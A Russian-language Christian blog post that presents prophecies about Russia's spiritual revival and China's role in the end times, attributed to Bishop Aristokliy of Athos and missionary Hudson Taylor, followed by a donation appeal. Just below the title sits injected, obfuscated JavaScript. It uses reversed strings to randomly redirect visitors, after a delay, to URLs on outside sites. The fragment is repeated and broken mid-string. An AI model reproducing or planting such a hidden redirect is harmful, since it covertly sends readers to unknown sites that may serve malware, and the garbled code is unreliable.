Исследования Монархия Пророчества

Два самых удивительных пророчества о России, Китае


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

До сих пор я говорил с вами, друзья, о библейских пророчествах о России — и к ним я снова вернусь, от них я далеко не собираюсь уходить. Но кроме того Господь являет будущее и некоторым избранным рабам Своим. С этими свидетельствами, взятыми не из Библии, надо быть внимательными и осторожными — сверять их с Библией и друг с другом.

Вот сегодня я дам вам пророческие свидетельства о России сразу двух достойнейших человек, т.к. свидетельство двух свидетелей заслуживает внимания. Особенно — если эти свидетели не сговорились. Особенно, если они не слышали и не знали друг о друге. Вот вам первое свидетельство. Возможно, о нем вы слышали. Но прочитайте его внимательно и сравните со вторым свидетельством, которое приходит с другого конце земли.

Накануне революции 1917-го года Православный епископ Аристоклий, старец Афонский (в миру — Алексей Алексеевич Амвросиев) предсказывал: «Зло вскоре придет в Россию (коммунистическая революция 1917 года), и куда бы ни пришло это зло, будут течь реки крови. Это несвойственно русской душе, это обман. Это дух из ада. Но, в конце концов, Россия будет освобождена, верующие из России отправятся в путь и обратят многие нации к Богу… У нас есть пророчества из давних веков, что лучи Евангелия придут с востока…

Свет по всему миру будет из России, которая страдает больше, чем кто-либо… Россия будет полностью возрождена! Все бросят Россию, от неё откажутся другие державы, предоставив ее себе самой. Это чтобы русские люди уповали на помощь Господню. Услышите, что в других странах начнутся беспорядки и подобное тому, что и в России, и о войнах услышите, и будут войны, – вот, уже время близко. Но не бойтесь ничего. Господь будет являть Свою чудесную милость. Конец будет через Китай. Какой-то необычный взрыв будет, и явится чудо Божие. И будет жизнь совсем другая на земле, но не очень долго. Крест Христов засияет над всем миром, потому что возвеличится наша Родина и будет как маяк во тьме для всех».

Сравните это свидетельство с пророчеством английского проповедника и миссионера 19-го века Хадсона Тейлора, посвятившего всю жизнь самоотверженному миссионерскому служению в Китае. Скажем лишь несколько слов об этом удивительном человеке. Жизнь его проходила под чудесным водительством Божиим, на которое он откликался. Чтобы быть принятым китайцами, Тейлор выучил язык, носил широкие шаровары, тяжёлое шёлковое платье, и обувь на плоской подошве.

Он также делает свою причёску на китайский манер — лысая голова с чёрным хвостиком. Он полюбил китайский народ, проник с христианской вестью в самое сердце Китая, куда раньше не ступала нога европейца. Он сделался объектом насмешек других миссионеров, потерял финансовую поддержку методистской церкви, к которой принадлежал, но от цели не отступил. И он достучался до сердец китайцев. Несмотря на многочисленные угрозы и гонения, этот отважный проповедник создал Внутрикитайскую миссию, сделавшись одним из самых успешных миссионеров в истории христианства.

В 1889 году находясь в отпуске в Англии, во время проповеди он внезапно остановился и застыл в безмолвии. Глаза его были закрыты, он, казалось, перестал дышать. Потом он как бы очнулся, продолжил проповедь, но через какое-то время, к удивлению огромной церкви, вновь замолчал, закрыл глаза и перестал замечать происходящее. Когда, наконец, он пришел в себя, то объявил собравшимся:

У меня было видение. Я видел великую войну, охватившую весь мир. Я видел, как эта война закончилась, а затем возобновилась, но в действительности это было две войны (здесь он предвидел Первую и Вторую Мировую войны. — ред.). После этого видел мятежи и восстания, затронувшие многие народы, а также духовное пробуждение в некоторых местах. В России произойдет всеобъемлющее национальное духовное пробуждение, настолько сильное, что не будет подобного ему. Видел, как из России оно распространилось во многие европейские страны. Затем произойдет всемирное пробуждение, после которого придет Христос.

Х. Тейлор

Это удивительное свидетельство человека, который сам в России никогда не был, и особо не задумывался о судьбах этой страны. Обратите внимание, что исконно русский епископ Аристоклий говорит о роли Китая в последнем пробуждении, в то время как Хадсон Тейлор, посвятивший жизнь служению в Китае, говорит о роли России. Наверное, это сделано Богом для того, чтобы никто не мог упрекнуть этих людей в предвзятости.

Есть немало других откровений, данных Богом посвященным людям, которые повторяют и подтверждают эти пророчества — я еще надеюсь познакомить вас с самыми важными и интересными. Ведь Бог не делает ничего, не явив этого прежде рабам Своим пророкам. Суть этих пророчеств людей Божиих о России всегда одна — когда от нее отвернутся страны Запада, когда в мире начнется кризис, в России произойдет небывалое, величайшее в истории человечества возрождение, которое затем распространится и на другие страны мира.

Кстати, Бог не есть Бог ненависти, но Бог любви. Он любит Запад не меньше, чем Восток. Россия сделает величайшую ошибку, если будет желать Западу гибели. Россия должна желать и нести Западу возрождения. Духовное возрождение начнется в России и перекинется на Запад. У нас нет оснований не доверять Библии и пророческим откровениям.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

***

Поддержать служение

«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».

***

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Международный Телеграмм чат «Возвращение домой — общение православных и протестантов

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.